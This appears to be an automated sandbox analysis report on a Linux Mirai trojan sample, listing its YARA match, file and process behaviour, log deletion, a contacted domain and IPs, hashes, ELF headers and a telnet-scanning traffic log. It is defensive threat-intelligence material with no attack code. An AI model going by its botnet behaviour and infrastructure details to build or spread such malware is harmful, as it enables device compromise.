        Source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_1cb033f3 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 49201ab37ff0b5cdfa9b0b34b6faa170bd25f04df51c24b0b558b7534fecc358, id = 1cb033f3-68c1-4fe5-9cd1-b5d066c1d86e, last_modified = 2021-09-16
        Source: classification engineClassification label: mal80.troj.evad.linELF@0/1@1/0

        Data Obfuscation

        barindex
        Source: /tmp/i686.elf (PID: 6211)File: /etc/configJump to behavior
        Source: /tmp/i686.elf (PID: 6211)Directory: /root/.cacheJump to behavior
        Source: /tmp/i686.elf (PID: 6211)Directory: /root/.sshJump to behavior
        Source: /tmp/i686.elf (PID: 6211)Directory: /root/.configJump to behavior
        Source: /tmp/i686.elf (PID: 6211)Directory: /root/.localJump to behavior
        Source: /tmp/i686.elf (PID: 6211)Directory: /tmp/.X11-unixJump to behavior
        Source: /tmp/i686.elf (PID: 6211)Directory: /tmp/.Test-unixJump to behavior
        Source: /tmp/i686.elf (PID: 6211)Directory: /tmp/.font-unixJump to behavior
        Source: /tmp/i686.elf (PID: 6211)Directory: /tmp/.ICE-unixJump to behavior
        Source: /tmp/i686.elf (PID: 6211)Directory: /tmp/.XIM-unixJump to behavior
        Source: /tmp/i686.elf (PID: 6211)Directory: /etc/.javaJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/230/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/110/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/231/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/111/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/232/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/112/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/233/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/113/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/234/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/114/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/235/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/115/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/236/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/116/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/237/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/117/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/118/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/910/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/119/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/912/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/10/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/11/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/918/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/12/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/13/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/14/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/15/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/16/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/17/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/18/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/120/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/121/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/1/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/122/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/243/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/123/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/2/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/124/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/3/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/4/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/125/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/126/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/127/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/6/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/248/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/128/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/249/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/800/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/9/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/801/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/20/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/21/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/22/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/23/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/24/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/25/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/26/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/27/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/28/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/29/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/491/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/250/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/130/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/251/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/252/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/132/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/253/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/254/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/255/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/256/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/257/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/379/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/258/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/259/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/936/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/30/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/35/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/260/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/261/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/141/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/262/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/263/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/264/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/144/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/265/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/266/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/267/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/269/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/270/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/272/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/274/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/278/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/157/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/281/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/286/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/720/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/721/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/847/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/77/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/78/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/79/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/80/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/81/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/82/fdJump to behavior
        Source: /tmp/i686.elf (PID: 6210)File opened: /proc/83/fdJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: /tmp/i686.elf (PID: 6211)Log files deleted: /var/log/kern.logJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: TrafficDNS traffic detected: queries for: www.onlydance.cam

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: i686.elf, type: SAMPLE
        Source: Yara matchFile source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: i686.elf, type: SAMPLE
        Source: Yara matchFile source: 6209.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6247.1.0000000000400000.0000000000416000.r-x.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Scripting
        Path Interception1
        Hidden Files and Directories
        1
        OS Credential Dumping
        System Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Indicator Removal
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
        Application Layer Protocol
        Traffic DuplicationData Destruction
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        SourceDetectionScannerLabelLink
        i686.elf34%ReversingLabsLinux.Trojan.Mirai
        i686.elf100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        www.onlydance.cam
        unknown
        unknowntrue
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http:///wget.shi686.elffalse
            high
            http:///curl.shi686.elffalse
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              86.245.117.227
              unknownFrance
              3215FranceTelecom-OrangeFRfalse
              172.63.52.23
              unknownUnited States
              393494L3TV-ASUSfalse
              188.166.182.194
              unknownNetherlands
              14061DIGITALOCEAN-ASNUSfalse
              95.173.38.84
              unknownLithuania
              24852VINITALTfalse
              218.185.163.100
              unknownJapan17676GIGAINFRASoftbankBBCorpJPfalse
              109.202.202.202
              unknownSwitzerland
              13030INIT7CHfalse
              74.125.250.129
              unknownUnited States
              15169GOOGLEUSfalse
              91.189.91.43
              unknownUnited Kingdom
              41231CANONICAL-ASGBfalse
              161.197.207.10
              unknownUnited States
              2384AOCNETUSfalse
              91.189.91.42
              unknownUnited Kingdom
              41231CANONICAL-ASGBfalse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              188.166.182.194i686.elfGet hashmaliciousMiraiBrowse
                i686.elfGet hashmaliciousMiraiBrowse
                  i686.elfGet hashmaliciousMiraiBrowse
                    109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                    • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                    91.189.91.43mips.elfGet hashmaliciousMiraiBrowse
                      mpsl.elfGet hashmaliciousMiraiBrowse
                        nshkarm6.elfGet hashmaliciousUnknownBrowse
                          103.6.170.65-boatnet.arm5-2025-01-05T14_12_42.elfGet hashmaliciousMiraiBrowse
                            sshd.elfGet hashmaliciousUnknownBrowse
                              nshkmips.elfGet hashmaliciousUnknownBrowse
                                fenty.arm7.elfGet hashmaliciousMiraiBrowse
                                  x86.elfGet hashmaliciousUnknownBrowse
                                    i686.elfGet hashmaliciousMiraiBrowse
                                      nshkarm5.elfGet hashmaliciousUnknownBrowse
                                        91.189.91.42mips.elfGet hashmaliciousMiraiBrowse
                                          mpsl.elfGet hashmaliciousMiraiBrowse
                                            nshkarm6.elfGet hashmaliciousUnknownBrowse
                                              103.6.170.65-boatnet.arm5-2025-01-05T14_12_42.elfGet hashmaliciousMiraiBrowse
                                                sshd.elfGet hashmaliciousUnknownBrowse
                                                  nshkmips.elfGet hashmaliciousUnknownBrowse
                                                    fenty.arm7.elfGet hashmaliciousMiraiBrowse
                                                      x86.elfGet hashmaliciousUnknownBrowse
                                                        i686.elfGet hashmaliciousMiraiBrowse
                                                          nshkarm5.elfGet hashmaliciousUnknownBrowse
                                                            No context
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            VINITALTi486.elfGet hashmaliciousMiraiBrowse
                                                            • 88.223.171.199
                                                            mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 95.173.38.85
                                                            8kjULT74JI.elfGet hashmaliciousMiraiBrowse
                                                            • 88.223.171.183
                                                            SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                            • 88.223.107.21
                                                            SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                            • 88.223.107.21
                                                            77.90.35.9-skid.ppc-2024-07-30T07_10_49.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 88.223.171.161
                                                            V4zFzdCyty.elfGet hashmaliciousMirai, MoobotBrowse
                                                            • 88.223.171.190
                                                            jew.x86.elfGet hashmaliciousMiraiBrowse
                                                            • 88.223.171.168
                                                            WDw9LnYz2p.elfGet hashmaliciousUnknownBrowse
                                                            • 79.132.186.178
                                                            GiTCjsd698.elfGet hashmaliciousMiraiBrowse
                                                            • 88.223.171.177
                                                            FranceTelecom-OrangeFRmomo.mips.elfGet hashmaliciousMiraiBrowse
                                                            • 83.195.96.16
                                                            momo.arm.elfGet hashmaliciousMiraiBrowse
                                                            • 86.225.67.11
                                                            momo.mpsl.elfGet hashmaliciousMiraiBrowse
                                                            • 86.210.114.189
                                                            momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 212.234.104.10
                                                            z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                            • 90.0.79.214
                                                            z0r0.i686.elfGet hashmaliciousMiraiBrowse
                                                            • 86.251.252.101
                                                            armv6l.elfGet hashmaliciousUnknownBrowse
                                                            • 129.181.246.249
                                                            3.elfGet hashmaliciousUnknownBrowse
                                                            • 90.124.6.208
                                                            1.elfGet hashmaliciousUnknownBrowse
                                                            • 90.1.160.108
                                                            armv6l.elfGet hashmaliciousUnknownBrowse
                                                            • 2.11.223.225
                                                            L3TV-ASUSarm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 172.63.17.2
                                                            loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                            • 172.62.198.24
                                                            jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                            • 52.144.24.105
                                                            x86.elfGet hashmaliciousMiraiBrowse
                                                            • 172.62.186.65
                                                            nklppc.elfGet hashmaliciousUnknownBrowse
                                                            • 172.62.162.46
                                                            amen.spc.elfGet hashmaliciousMiraiBrowse
                                                            • 172.63.52.254
                                                            5r3fqt67ew531has4231.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                            • 172.62.186.56
                                                            8v2IShmMos.elfGet hashmaliciousUnknownBrowse
                                                            • 172.62.186.39
                                                            nabarm7.elfGet hashmaliciousUnknownBrowse
                                                            • 172.62.141.149
                                                            la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                            • 52.144.24.151
                                                            DIGITALOCEAN-ASNUSi686.elfGet hashmaliciousMiraiBrowse
                                                            • 188.166.182.194
                                                            cZO.exeGet hashmaliciousUnknownBrowse
                                                            • 68.183.196.133
                                                            momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 174.138.12.56
                                                            avaydna.exeGet hashmaliciousNjratBrowse
                                                            • 157.245.14.184
                                                            4.elfGet hashmaliciousUnknownBrowse
                                                            • 157.230.180.162
                                                            i686.elfGet hashmaliciousMiraiBrowse
                                                            • 188.166.182.194
                                                            2.elfGet hashmaliciousUnknownBrowse
                                                            • 157.230.60.234
                                                            CarrierPortal.exeGet hashmaliciousUnknownBrowse
                                                            • 162.243.76.72
                                                            1.elfGet hashmaliciousUnknownBrowse
                                                            • 157.230.220.254
                                                            1.elfGet hashmaliciousUnknownBrowse
                                                            • 157.245.145.61
                                                            No context
                                                            No context
                                                            Process:/tmp/i686.elf
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):146
                                                            Entropy (8bit):4.024394204278479
                                                            Encrypted:false
                                                            SSDEEP:3:TBGTD+FN5CSNE4F58SASI7AWHF5x5mAR/VB6GEDwcL7uoL/:TBGD+5F+RLl0AR/VgGEDLHB/
                                                            MD5:E77B19565FA2C8C6B780A198F3889313
                                                            SHA1:4B18D7D88944804C96620323D60EE89E4B985BB4
                                                            SHA-256:F71785724FCE340C9FF9CD4341B920A602A47C0B496C57CCA177B94CB4BA297D
                                                            SHA-512:D22AAC8ADD55BCD9672465F3E67AF9DD4B69C0C85903C16A1C19ABDEA59EA0674DF69FF7D7F646FE642417103C7D4B6B5B3B1D5A8017C321417CBC5B3C243732
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:The gods watch from the heavens? Let them see what a mortal can become. let them witness a man who defies their will and carves his own destiny...
                                                            File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                                            Entropy (8bit):6.275108619193818
                                                            TrID:
                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                            File name:i686.elf
                                                            File size:91'792 bytes
                                                            MD5:8f0239e6b5b39a97e8e64ff9217b00a0
                                                            SHA1:21fc853d5b63878943c811c295ebc8b06ff6932b
                                                            SHA256:ddbe5a641b1f5132023c52c0fcff8f8d22f8bae192c6a219d9131a241eb1d65e
                                                            SHA512:c9e9905538920c55bb074c798be68575ee87e03766ad2ae2e310f2ab32c303095455478d139380663fa82818b3f6fa8c1f9b599499da8bf521ab1ced03eaf7ba
                                                            SSDEEP:1536:T1E5CYmiaabu0Tii9kA9be5VpJd3OlThdDK2amn7R0RFk6uJWlzkBkB:T10CYmiawLiife59wlmmnWRFkhWlpB
                                                            TLSH:3E932A1374D08DFDC49AC9394A6F913AE672F16D2221734B2784BB312E8EE213F1E559
                                                            File Content Preview:.ELF..............>.......@.....@........d..........@.8...@.......................@.......@.....0]......0]......................8]......8]Q.....8]Q..............q..............Q.td....................................................H...._....j...H........

                                                            ELF header

                                                            Class:ELF64
                                                            Data:2's complement, little endian
                                                            Version:1 (current)
                                                            Machine:Advanced Micro Devices X86-64
                                                            Version Number:0x1
                                                            Type:EXEC (Executable file)
                                                            OS/ABI:UNIX - System V
                                                            ABI Version:0
                                                            Entry Point Address:0x400194
                                                            Flags:0x0
                                                            ELF Header Size:64
                                                            Program Header Offset:64
                                                            Program Header Size:56
                                                            Number of Program Headers:3
                                                            Section Header Offset:91152
                                                            Section Header Size:64
                                                            Number of Section Headers:10
                                                            Header String Table Index:9
                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                            NULL0x00x00x00x00x0000
                                                            .initPROGBITS0x4000e80xe80x130x00x6AX001
                                                            .textPROGBITS0x4001000x1000x116960x00x6AX0016
                                                            .finiPROGBITS0x4117960x117960xe0x00x6AX001
                                                            .rodataPROGBITS0x4117c00x117c00x45700x00x2A0032
                                                            .ctorsPROGBITS0x515d380x15d380x100x00x3WA008
                                                            .dtorsPROGBITS0x515d480x15d480x100x00x3WA008
                                                            .dataPROGBITS0x515d600x15d600x6700x00x3WA0032
                                                            .bssNOBITS0x5163e00x163d00x6ae80x00x3WA0032
                                                            .shstrtabSTRTAB0x00x163d00x3e0x00x0001
                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                            LOAD0x00x4000000x4000000x15d300x15d306.34280x5R E0x100000.init .text .fini .rodata
                                                            LOAD0x15d380x515d380x515d380x6980x71902.56460x6RW 0x100000.ctors .dtors .data .bss
                                                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 6, 2025 00:52:50.292771101 CET4828823192.168.2.23172.63.52.23
                                                            Jan 6, 2025 00:52:50.297729969 CET2348288172.63.52.23192.168.2.23
                                                            Jan 6, 2025 00:52:50.298099041 CET4828823192.168.2.23172.63.52.23
                                                            Jan 6, 2025 00:52:50.301853895 CET5811423192.168.2.2395.173.38.84
                                                            Jan 6, 2025 00:52:50.304718018 CET6024423192.168.2.2386.245.117.227
                                                            Jan 6, 2025 00:52:50.306631088 CET235811495.173.38.84192.168.2.23
                                                            Jan 6, 2025 00:52:50.306787968 CET5811423192.168.2.2395.173.38.84
                                                            Jan 6, 2025 00:52:50.307176113 CET4115423192.168.2.23161.197.207.10
                                                            Jan 6, 2025 00:52:50.309530020 CET236024486.245.117.227192.168.2.23
                                                            Jan 6, 2025 00:52:50.311980963 CET2341154161.197.207.10192.168.2.23
                                                            Jan 6, 2025 00:52:50.312007904 CET6024423192.168.2.2386.245.117.227
                                                            Jan 6, 2025 00:52:50.312757969 CET4115423192.168.2.23161.197.207.10
                                                            Jan 6, 2025 00:52:50.332393885 CET3741423192.168.2.23218.185.163.100
                                                            Jan 6, 2025 00:52:50.337264061 CET2337414218.185.163.100192.168.2.23
                                                            Jan 6, 2025 00:52:50.337307930 CET3741423192.168.2.23218.185.163.100
                                                            Jan 6, 2025 00:52:50.345618010 CET3741423192.168.2.23218.185.163.100
                                                            Jan 6, 2025 00:52:50.345623016 CET4828823192.168.2.23172.63.52.23
                                                            Jan 6, 2025 00:52:50.345623016 CET6024423192.168.2.2386.245.117.227
                                                            Jan 6, 2025 00:52:50.345623016 CET5811423192.168.2.2395.173.38.84
                                                            Jan 6, 2025 00:52:50.345634937 CET4115423192.168.2.23161.197.207.10
                                                            Jan 6, 2025 00:52:50.350490093 CET2337414218.185.163.100192.168.2.23
                                                            Jan 6, 2025 00:52:50.350641012 CET2348288172.63.52.23192.168.2.23
                                                            Jan 6, 2025 00:52:50.350650072 CET2341154161.197.207.10192.168.2.23
                                                            Jan 6, 2025 00:52:50.350657940 CET236024486.245.117.227192.168.2.23
                                                            Jan 6, 2025 00:52:50.350689888 CET3741423192.168.2.23218.185.163.100
                                                            Jan 6, 2025 00:52:50.350699902 CET4828823192.168.2.23172.63.52.23
                                                            Jan 6, 2025 00:52:50.350766897 CET4115423192.168.2.23161.197.207.10
                                                            Jan 6, 2025 00:52:50.350769043 CET6024423192.168.2.2386.245.117.227
                                                            Jan 6, 2025 00:52:50.355304956 CET235811495.173.38.84192.168.2.23
                                                            Jan 6, 2025 00:52:50.355400085 CET5811423192.168.2.2395.173.38.84
                                                            Jan 6, 2025 00:52:50.369931936 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:52:50.374706984 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:52:50.374752998 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:52:51.195781946 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:52:51.195869923 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:52:51.474529028 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:52:51.474581957 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:52:51.890464067 CET43928443192.168.2.2391.189.91.42
                                                            Jan 6, 2025 00:52:53.832640886 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:52:53.837599993 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:52:57.265743017 CET42836443192.168.2.2391.189.91.43
                                                            Jan 6, 2025 00:52:58.801527977 CET4251680192.168.2.23109.202.202.202
                                                            Jan 6, 2025 00:53:03.840828896 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:53:03.845741987 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:53:13.135525942 CET43928443192.168.2.2391.189.91.42
                                                            Jan 6, 2025 00:53:13.848975897 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:53:13.854137897 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:53:23.374106884 CET42836443192.168.2.2391.189.91.43
                                                            Jan 6, 2025 00:53:23.857595921 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:53:23.862549067 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:53:29.517260075 CET4251680192.168.2.23109.202.202.202
                                                            Jan 6, 2025 00:53:31.612725973 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:53:31.612782955 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:53:41.619600058 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:53:41.624541998 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:53:51.626261950 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:53:51.631201982 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:53:54.089865923 CET43928443192.168.2.2391.189.91.42
                                                            Jan 6, 2025 00:54:01.634566069 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:54:01.639446020 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:54:11.643076897 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:54:11.648037910 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:54:14.567043066 CET42836443192.168.2.2391.189.91.43
                                                            Jan 6, 2025 00:54:21.650712967 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:54:21.655718088 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:54:31.657047033 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:54:31.662065029 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:54:41.663317919 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:54:41.668245077 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:54:51.669924974 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:54:51.674892902 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:55:01.676569939 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:55:01.681464911 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:55:11.683316946 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:55:11.688383102 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:55:18.655358076 CET583754640188.166.182.194192.168.2.23
                                                            Jan 6, 2025 00:55:18.655467033 CET546405837192.168.2.23188.166.182.194
                                                            Jan 6, 2025 00:55:28.660988092 CET546405837192.168.2.23188.166.182.194
